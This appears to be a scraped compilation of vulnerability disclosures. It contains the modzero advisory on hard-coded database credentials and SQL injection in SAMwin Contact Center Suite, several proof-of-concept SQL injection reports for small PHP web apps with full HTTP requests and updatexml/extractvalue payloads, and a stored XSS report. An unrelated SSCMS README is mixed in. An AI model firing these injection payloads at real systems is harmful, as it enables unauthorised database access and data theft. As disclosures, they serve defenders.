A vulnerability was found in Telecommunication Software SAMwin Contact Center Suite 5.1. It has been rated as critical. Affected by this issue is the function getCurrentDBVersion in the library SAMwinLIBVB.dll of the credential handler. Authentication is possible with hard-coded credentials. Upgrading to version 6.2 is able to address this issue. It is recommended to upgrade the affected component.

\-----------------------------------------------------------------v1.1- modzero Security Advisory: SAMwin Contact Center Suite - Architectural issues lead to database compromise \[MZ-13-06\] --------------------------------------------------------------------- --------------------------------------------------------------------- 1. Timeline --------------------------------------------------------------------- \* 2014-03-13: Advisory will be published. \* 2013-09-24: Vendor responded. \* 2013-09-20: Vendor has been contacted. --------------------------------------------------------------------- 2. Summary --------------------------------------------------------------------- Vendor: Telecommunication Software GmbH Products known to be affected: SAMwin Contact Center Suite 5.1, the SAMwin Agent login mask shows version 5.01.19.06 Severity: High Remote exploitable: Yes The SAMwin Call Center Suite is a SIP-based call center solution, which assists users with various features like call forwarding, skill based routing, a realtime wallboard, reporting and supervisor monitoring. The environment consists of at least one SAMwin Contact Center Suite Server (SAMwin Server) component, a SQL database server and the SAMwin Contact Center Suite Agent (SAMwin Agent). The SAMwin Agent is installed on the call center employee's desktop computer and provides a configured set of features, based on a role and permission concept configured by the supervisor or an administrator. The SAMwin Server's core function is SIP-based call handling and routing. The database server acts as datastore and is directly accessed by the SAMwin Server and Agent. The architecture does not use any middleware, which could verify or sanitize communication between the SAMwin Agents and the database. The SAMwinAgent is designed to use hard coded database authentication credentials to connect to the SAMwin database server during startup, prior to any other user authentication. The password is defined and hard coded by the vendor. Therefore, all installations on any customer-site use the same database credentials. No input sanitizing is conducted and no prepared statements are used and, thus, arbitrary SQL command execution is possible via the username field of the login mask. However, an attacker might simply connect directly to the database using the credentials he extracted from the SAMwin binaries. As all the information regarding user-accounts, call routing and interconnection details of the infrastructure is stored in the database, an attacker can gain full control over the SAMwin software that handles calls. Depending on the database configuration hardening, an attacker might be able to gain access to the database server's operating system as well, to read, write and execute arbitrary files on the filesystem. --------------------------------------------------------------------- 3. Details --------------------------------------------------------------------- The SAMwin Agent is designed to use hard coded database authentication credentials to connect to the SQL database server during startup, prior to any other authentication. To logon to the SAMwin Agent application, the user enters his access credentials into the corresponding fields in the login mask. When a user enters his SAMwin account information into the login screen, SQL queries are sent directly to the database server using hard coded credentials verifying the given username and password against credentials stored in the database. The database credentials can be extracted from the SAMwin Agent by analyzing the SAMwinLIBVB.dll shared library that is usually located under C:\\Program Files\\contact center suite 5.1\\Bin\\. The file is available to everyone with access to the SAMwin Agent software. The database connection is initiated a method called getCurrentDBVersion(), which calls generateTransactSql() to obtain the password for the database connection: new SqlConnection( "Data Source=%%SERVER%%; Initial\\ Catalog=%%DATABASE%%; UId=%%USER%%; Pwd=%%PWD%%;Pooling=False"\\ .Replace("%%USER%%", "SAMwin").Replace("%%PWD%%",\\ Database.generateTransactSql()).Replace("%%SERVER%%", host)\\ .Replace("%%DATABASE%%", dbName) ); The function generateTransactSql() de-obfuscates the hard coded database password and returns its cleartext representation. The username SAMwin and the de-obfuscated 36 characters long password can be used by an attacker to connect to the SQL database with any SQL client to get access to its data. Due to the absence of any middleware sanitizing and verifying input data send by the SAMwin Agent, arbitrary SQL commands can be executed from the username field of the SAMwin Agent login mask. When a SAMwin Agent user logs in, the username and password will be compared against values that are stored in the database. By terminating the username with a single quote character, any person with access to the SAMwin Agent login form can execute malicious SQL statements. For example, the following string can be used as username to verify the SQL command execution on the SQL server. USERNAME' AND 1=1; WAITFOR DELAY '0:0:3'-- The example above can be used for a blind SQL injection, as the database will delay execution for 3 seconds; the timing in this case is a side-channel to proof the problem of blind injections into SQL statements. As the credentials required for a direct database access are available to anyone with access to the SAMwin Agent, the SQL injection is not required to be abused by an attacker as he simply could connect the database directly using any arbitrary SQL client. Direct access to the database is required based on the given architecture. Otherwise, the legit SAMWin Agent could not operate. It is recommended to use a middleware application between client and backend systems for being able to perform authentication and input validation, before data is passed to a database. No client software should be allowed to connect to any database system directly using hard coded credentials. --------------------------------------------------------------------- 4. Impact --------------------------------------------------------------------- Because credentials are hard coded and equal for all installations, an attacker reveals them once and is able to exploit multiple installations. Conceptually, these database credential results in read and write access to the database. Thus, an attacker knowing these credentials and with direct access to the database is able to modify the database content. An SQL injection vulnerability within the application leads to a full compromise, too, as all the SQL statements will be executed using the same database account with read and write permissions. As the content of the database holds all the information regarding the users, the call routing and interconnection details of the surrounding infrastructure, a successful attacker gains full control over the call center, its calls and probably data of other systems. --------------------------------------------------------------------- 5. Workaround --------------------------------------------------------------------- No known workaround to fix the architecture design is available yet. Network access to the SAMwin database server should be restricted to prevent access from untrustworthy networks and clients. --------------------------------------------------------------------- 6. Fix --------------------------------------------------------------------- According to the vendor, users of this software should upgrade to version 6.2, which should be available in Q4 2013. The vendor will not provide any fixes for previous versions. --------------------------------------------------------------------- 7. Credits --------------------------------------------------------------------- \* Tobias Ospelt (tobias@modzero.ch) \* Max Moser (mmo@modzero.ch) --------------------------------------------------------------------- 8. About modzero --------------------------------------------------------------------- The independent Swiss company modzero AG assists clients with security analysis in the complex areas of computer technology. The focus lies on highly detailed technical analysis of concepts, software and hardware components as well as the development of individual solutions. Colleagues at modzero AG work exclusively in practical, highly technical computer-security areas and can draw on decades of experience in various platforms, system concepts, and designs. http://modzero.ch contact@modzero.ch --------------------------------------------------------------------- 9. Disclaimer --------------------------------------------------------------------- The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

CVE-2013-10002

Covid-19 Travel Pass Management System v1.0 is vulnerable to SQL Injection via /ctpms/classes/Master.php?f=update_application_status

Permalink

Cannot retrieve contributors at this time

**covid-19-travel-pass-management-system v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ctpms/classes/Master.php?f=update\_application\_status

Vulnerability location:/ctpms/classes/Master.php?f=update\_application\_status, id

\[+\] Payload: 1'and/\*\*/extractvalue(1,concat(char(126),database()))and' // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /ctpms/classes/Master.php?f=update_application_status HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------4024160998608039623756913069
    Content-Length: 335
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/ctpms/admin/?page=applications/view_application&id=1
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------4024160998608039623756913069
    Content-Disposition: form-data; name="id"
    
    1'and/**/extractvalue(1,concat(char(126),database()))and'
    -----------------------------4024160998608039623756913069
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------4024160998608039623756913069--

CVE-2022-30838: bug_report_CVE/sql.md at main · mikeccltt/bug_report_CVE

Room-rent-portal-site v1.0 is vulnerable to SQL Injection via /rrps/classes/Master.php?f=delete_category, id.

Permalink

**room-rent-portal-site v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15301/room-rent-portal-site-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /rrps/classes/Master.php?f=delete\_category

Vulnerability location:/rrps/classes/Master.php?f=delete\_category, id

\[+\] Payload: 2'and/\*\*/extractvalue(1,concat(char(126),database()))and'

Tested on Windows 10, XAMPP

    POST http://192.168.2.106/rrps/classes/Master.php?f=delete_category HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 60
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/rrps/admin/?page=categories
    Cookie: PHPSESSID=h4hpbcj74nsiroalrkj8o2251s
    
    id=2'and/**/extractvalue(1,concat(char(126),database()))and'

CVE-2022-30843: bug_report_CVE/sql.md at main · mikeccltt/bug_report_CVE

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/classes/Master.php?f=delete_product.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /asms/classes/Master.php?f=delete\_product

Vulnerability location: /asms/classes/Master.php?f=delete\_product, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /asms/classes/Master.php?f=delete_product HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 65
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/asms/admin/?page=products
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-30463: automotive/sql.md at main · mikeccltt/automotive

ChatBot App with Suggestion in PHP/OOP v1.0 is vulnerable to SQL Injection via /simple_chat_bot/classes/Master.php?f=delete_response, id.

Permalink

**chatbot-app-suggestion-phpoop v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /simple\_chat\_bot/classes/Master.php?f=delete\_response

Vulnerability location: /simple\_chat\_bot/classes/Master.php?f=delete\_response, id

\[+\] Payload: id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /simple_chat_bot/classes/Master.php?f=delete_response HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 65
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/simple_chat_bot/admin/?page=responses
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-30459: chatbot/sql.md at main · mikeccltt/chatbot

Water-billing-management-system v1.0 is vulnerable to SQL Injection via /wbms/classes/Master.php?f=delete_client, id

Permalink

**water-billing-management-system v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15309/water-billing-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /wbms/classes/Master.php?f=delete\_client

Vulnerability location: /wbms/classes/Master.php?f=delete\_client, id

\[+\] Payload:id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /wbms/classes/Master.php?f=delete_client HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 65
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/wbms/admin/?page=clients
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-30461: wbms_bug_report/sql.md at main · mikeccltt/wbms_bug_report

SiteServer CMS V6.15.51 is affected by a Cross Site Scripting (XSS) vulnerability.

**SSCMS**

SSCMS 基于 .NET Core，能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。

**版本**

项目发布的正式版本存放在 master 分支，最新版本存放在 staging 分支

编译状态

版本号

发布日期

**开发文档**

《SSCMS 使用指南》

《SSCMS 系统更新》

《SSCMS STL 语言》

《SSCMS 插件开发》

《SSCMS 官方插件》

《SSCMS 命令行》

《SSCMS REST API》

《SSCMS 数据结构》

**SSCMS 源码结构**

    │ sscms.sln                  Visual Studio 项目文件
    │
    ├─docker                      Docker 配置文件
    ├─src/Datory                  数据库基础类
    ├─src/SSCMS                   接口、基础类
    ├─src/SSCMS.Cli               命令行工具
    ├─src/SSCMS.Core              CMS核心代码
    ├─src/SSCMS.Web               CMS App
    └─tests                       测试
    

**发布跨平台版本****Window(64 位)：**

    npm install
    npm run build-win-x64
    dotnet build ./build-win-x64/build.sln -c Release
    dotnet publish ./build-win-x64/src/SSCMS.Cli/SSCMS.Cli.csproj -r win-x64 -c Release -o ./publish/sscms-win-x64
    dotnet publish ./build-win-x64/src/SSCMS.Web/SSCMS.Web.csproj -r win-x64 -c Release -o ./publish/sscms-win-x64
    npm run copy-win-x64
    

> Note: 进入文件夹 ./publish/sscms-win-x64 获取最终发布版本

**Window(32 位)：**

    npm install
    npm run build-win-x32
    dotnet build ./build-win-x32/build.sln -c Release
    dotnet publish ./build-win-x32/src/SSCMS.Cli/SSCMS.Cli.csproj -r win-x32 -c Release -o ./publish/sscms-win-x32
    dotnet publish ./build-win-x32/src/SSCMS.Web/SSCMS.Web.csproj -r win-x32 -c Release -o ./publish/sscms-win-x32
    npm run copy-win-x32
    

> Note: 进入文件夹 ./publish/sscms-win-x32 获取最终发布版本

**Linux：**

    npm install
    npm run build-linux-x64
    dotnet build ./build-linux-x64/build.sln -c Release
    dotnet publish ./build-linux-x64/src/SSCMS.Cli/SSCMS.Cli.csproj -r linux-x64 -c Release -o ./publish/sscms-linux-x64
    dotnet publish ./build-linux-x64/src/SSCMS.Web/SSCMS.Web.csproj -r linux-x64 -c Release -o ./publish/sscms-linux-x64
    npm run copy-linux-x64
    

> Note: 进入文件夹 ./publish/sscms-linux-x64 获取最终发布版本

**MacOS：**

    npm install
    npm run build-osx-x64
    dotnet build ./build-osx-x64/build.sln -c Release
    dotnet publish ./build-osx-x64/src/SSCMS.Cli/SSCMS.Cli.csproj -r osx-x64 -c Release -o ./publish/sscms-osx-x64
    dotnet publish ./build-osx-x64/src/SSCMS.Web/SSCMS.Web.csproj -r osx-x64 -c Release -o ./publish/sscms-osx-x64
    npm run copy-osx-x64
    

> Note: 进入文件夹 ./publish/sscms-osx-x64 获取最终发布版本

**在 Docker 中运行**

拉取最新版本的 SS CMS 镜像

docker pull sscms/core:latest

运行 SS CMS 容器

docker run -d \\
    --name my-sscms \\
    -p 80:80 \\
    --restart=always \\
    -v volume-sscms:/app/wwwroot \\
    -e SSCMS\_SECURITY\_KEY=e2a3d303-ac9b-41ff-9154-930710af0845 \\
    -e SSCMS\_DATABASE\_TYPE=SQLite \\
    sscms/core

**贡献代码**

项目编译需要使用 Visual Studio 2019，你可以从这里下载 Visual Studio Community 2019

代码贡献有很多形式，从提交问题，撰写文档，到提交代码，我们欢迎任何形式的贡献！

**系统更新**

SSCMS 产品将每隔两月发布新的正式版本，我们将在每次迭代中对核心功能、文档支持、功能插件以及网站模板四个方面进行持续改进。

**问题与建议**

如果发现任何 BUG 以及对产品使用的问题与建议，请提交至 Github Issues 或者 Gitee Issues。

**关注最新动态**

**License**

GNU Affero General Public License v3.0

Copyright (C) 2003-2022 SSCMS

CVE-2021-42656: GitHub - siteserver/cms: SS CMS 基于 .NET Core，能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。

Badminton Center Management System 1.0 is vulnerable to SQL Injection via /bcms/classes/Master.php?f=delete_court_rental, id.

**badminton-center-management-system has SQL injection vulnerability **

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Date: 2022-05-06

Vulnerability File: /bcms/classes/Master.php?f=delete\_court\_rental

Vulnerability location: /bcms/classes/Master.php?f=delete\_court\_rental, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /bcms/classes/Master.php?f=delete_court_rental HTTP/1.1
    Host: bcms.com
    Proxy-Connection: keep-alive
    Content-Length: 65
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://bcms.com
    Referer: http://bcms.com/bcms/admin/?page=court_rentals
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=4gth9auqof3f53e4gedjm3dct2
    
    id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-30455: badminton-center-management-system/badminton-center-management-system.md at main · mikeccltt/badminton-center-management-system

Merchandise Online Store 1.0 is vulnerable to SQL Injection via /vloggers_merch/classes/Master.php?f=delete_product.

Permalink

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/classes/Master.php?f=delete\_product

Vulnerability location: /vloggers\_merch/classes/Master.php?f=delete\_product, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /vloggers\_merch/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/vloggers\_merch/admin/?page=product
Content-Length: 65
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close
id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-30454: bug_report/SQL-1.md at main · mikeccltt/bug_report

A vulnerability, which was classified as problematic, has been found in Home Clean Services Management System 1.0. This issue affects register.php?link=registerand. The manipulation with the input <script>alert(1)</script> leads to cross site scripting. The attack may be initiated remotely but demands authentication. Exploit details have been disclosed to the public.

**Home Clean Services Management System Stored Cross-Site Scripting(XSS)****Exploit Title: Home Clean Services Management System Stored Cross-Site Scripting(XSS)****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html****Software Link: https://www.sourcecodester.com/download-code?nid=15293&title=Home+Clean+Service+System+in+PHP+Free+Source+Code****Version: Home Clean Services Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Home Clean Services Management System does not filter the content correctly at the "register" module, resulting in the generation of stored XSS.

**Payload used:**

<script>alert(111)</script>

**Proof of Concept**

1.  Login the CMS. Admin Default Access: Email: admin Password: admin
    
2.  Open Page http://172.24.5.102/HCS/public\_html/register.php?link=registerand click Edit button
    
3.  Put XSS payload (<script>alert(111)</script>) in the content box and click on Register to publish the page  
    
4.  Viewing the successfully published page,Open Page http://172.24.5.102/HCS/public\_html/admin/userlist.php,We can see the alert.

Tag

#sql